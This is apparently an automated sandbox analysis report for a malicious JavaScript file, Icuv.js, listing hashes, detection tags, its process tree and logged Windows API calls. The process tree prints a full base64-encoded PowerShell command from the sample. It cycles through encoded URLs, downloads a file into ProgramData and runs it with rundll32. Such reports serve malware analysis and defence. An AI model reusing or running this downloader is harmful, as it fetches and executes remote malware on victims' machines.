popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Icuv.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 19, 2023, 6:06 p.m. May 19, 2023, 6:08 p.m.
Size 224.0KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 69cd79e7cef9f9fcd5d0e7d47b179566
SHA256 c74cf0cb7927a8438a84c9cedbdbab3e4815550813336043f39674a67b6a021a
CRC32 83A30984
ssdeep 3072:nwOwhdamLtjKVJAf9DWODhXv5cIyC3A860pSuOXfvK5HR/:n0daC3NTV3AQAvWd
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Icuv.js

    2552

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries

      2688

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"

        2812

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d3c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d40e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d40e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d40e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d3d28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d4228
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d38e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d3de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d3de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d3de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005d3de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02702000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
